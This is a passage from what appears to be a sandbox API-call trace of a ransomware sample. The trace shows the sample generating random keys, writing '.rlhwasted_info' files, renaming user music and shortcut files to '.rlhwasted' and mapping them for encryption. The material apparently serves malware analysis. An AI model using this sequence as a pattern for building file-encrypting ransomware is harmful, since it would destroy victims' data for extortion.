live.url.rlhwasted")) returned 1 [0194.118] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0194.118] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0194.118] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0194.119] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e8c60 | out: pbBuffer=0x6e8c60) returned 1 [0194.119] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.119] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0194.183] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0194.183] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.194] SetEndOfFile (hFile=0x124) returned 1 [0194.196] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.196] CloseHandle (hObject=0x124) returned 1 [0194.200] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0194.201] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0194.201] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0194.201] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.202] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned 78 [0194.202] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a6) returned 0x6d4580 [0194.202] lstrcpyW (in: lpString1=0x6d461c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0194.202] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0194.202] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0194.202] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0194.203] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0194.204] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0194.206] SetEndOfFile (hFile=0x124) returned 1 [0194.206] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.206] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.206] lstrcpyW (in: lpString1=0x6d461c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0194.206] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.rlhwasted")) returned 1 [0194.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0194.208] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0194.208] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0194.209] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0194.210] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.210] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0194.211] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0194.211] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.224] SetEndOfFile (hFile=0x124) returned 1 [0194.227] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.227] CloseHandle (hObject=0x124) returned 1 [0194.275] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0194.275] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0194.276] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0194.276] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0194.277] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\-KuUCMDYo3rcNSc0.m4a") returned 60 [0194.277] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x282) returned 0x6d4580 [0194.277] lstrcpyW (in: lpString1=0x6d45f8, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0194.277] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0194.277] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0194.278] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0194.278] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0194.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\-KuUCMDYo3rcNSc0.m4a.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\-kuucmdyo3rcnsc0.m4a.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0194.279] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0194.280] SetEndOfFile (hFile=0x124) returned 1 [0194.280] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.280] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.280] lstrcpyW (in: lpString1=0x6d45f8, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0194.281] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\-KuUCMDYo3rcNSc0.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\-kuucmdyo3rcnsc0.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\-KuUCMDYo3rcNSc0.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\-kuucmdyo3rcnsc0.m4a.rlhwasted")) returned 1 [0194.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\-KuUCMDYo3rcNSc0.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\-kuucmdyo3rcnsc0.m4a.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0194.282] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0194.283] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0194.284] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0194.284] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0194.284] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0194.285] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0194.285] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0194.295] SetEndOfFile (hFile=0x124) returned 1 [0194.298] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.298] CloseHandle (hObject=0x124) returned 1 [0194.301] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0194.301] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0194.302] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0194.302] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.302] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4 vcL.mp3") returned 49 [0194.302] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x26c) returned 0x6d4580 [0194.303] lstrcpyW (in: lpString1=0x6d45e2, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0194.303] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0194.303] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0194.304] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0194.304] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4 vcL.mp3.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4 vcl.mp3.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0194.304] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0194.306] SetEndOfFile (hFile=0x124) returned 1 [0194.306] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.306] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.306] lstrcpyW (in: lpString1=0x6d45e2, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0194.306] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4 vcL.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4 vcl.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4 vcL.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4 vcl.mp3.rlhwasted")) returned 1 [0194.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4 vcL.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4 vcl.mp3.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0194.307] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0194.313] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0194.314] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0194.314] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.314] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0194.315] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0194.315] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.325] SetEndOfFile (hFile=0x124) returned 1 [0194.328] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.328] CloseHandle (hObject=0x124) returned 1 [0194.332] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0194.332] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0194.333] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0194.333] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.333] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f_a0r6qVOxqYrDI.mp3") returned 59 [0194.333] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x280) returned 0x6d4580 [0194.333] lstrcpyW (in: lpString1=0x6d45f6, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0194.333] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0194.333] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0194.334] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0194.334] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f_a0r6qVOxqYrDI.mp3.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\f_a0r6qvoxqyrdi.mp3.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0194.335] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0194.336] SetEndOfFile (hFile=0x124) returned 1 [0194.337] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.337] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.337] lstrcpyW (in: lpString1=0x6d45f6, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0194.337] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f_a0r6qVOxqYrDI.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\f_a0r6qvoxqyrdi.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f_a0r6qVOxqYrDI.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\f_a0r6qvoxqyrdi.mp3.rlhwasted")) returned 1 [0194.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f_a0r6qVOxqYrDI.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\f_a0r6qvoxqyrdi.mp3.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0194.338] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0194.341] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0194.342] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0194.342] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0194.342] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0194.343] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0194.343] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0194.354] SetEndOfFile (hFile=0x124) returned 1 [0194.357] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.357] CloseHandle (hObject=0x124) returned 1 [0194.395] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0194.395] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0194.396] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0194.396] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0194.396] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\JamH02y1AQu3BYLOq UO.m4a") returned 64 [0194.396] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28a) returned 0x6d4580 [0194.396] lstrcpyW (in: lpString1=0x6d4600, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0194.396] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0194.396] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0194.397] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0194.397] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0194.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\JamH02y1AQu3BYLOq UO.m4a.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jamh02y1aqu3byloq uo.m4a.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0194.398] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0194.399] SetEndOfFile (hFile=0x124) returned 1 [0194.399] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.399] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.399] lstrcpyW (in: lpString1=0x6d4600, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0194.399] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\JamH02y1AQu3BYLOq UO.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jamh02y1aqu3byloq uo.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\JamH02y1AQu3BYLOq UO.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jamh02y1aqu3byloq uo.m4a.rlhwasted")) returned 1 [0194.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\JamH02y1AQu3BYLOq UO.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jamh02y1aqu3byloq uo.m4a.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0194.400] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0194.404] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0194.405] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0194.405] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0194.406] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0194.406] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0194.406] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0194.420] SetEndOfFile (hFile=0x124) returned 1 [0194.423] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.423] CloseHandle (hObject=0x124) returned 1 [0194.426] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0194.426] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0194.427] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0194.427] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.427] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\JiubcnRU-kG.m4a") returned 55 [0194.427] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x278) returned 0x6d4580 [0194.427] lstrcpyW (in: lpString1=0x6d45ee, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0194.427] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0194.427] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0194.428] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0194.428] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\JiubcnRU-kG.m4a.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jiubcnru-kg.m4a.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0194.429] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0194.430] SetEndOfFile (hFile=0x124) returned 1 [0194.430] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 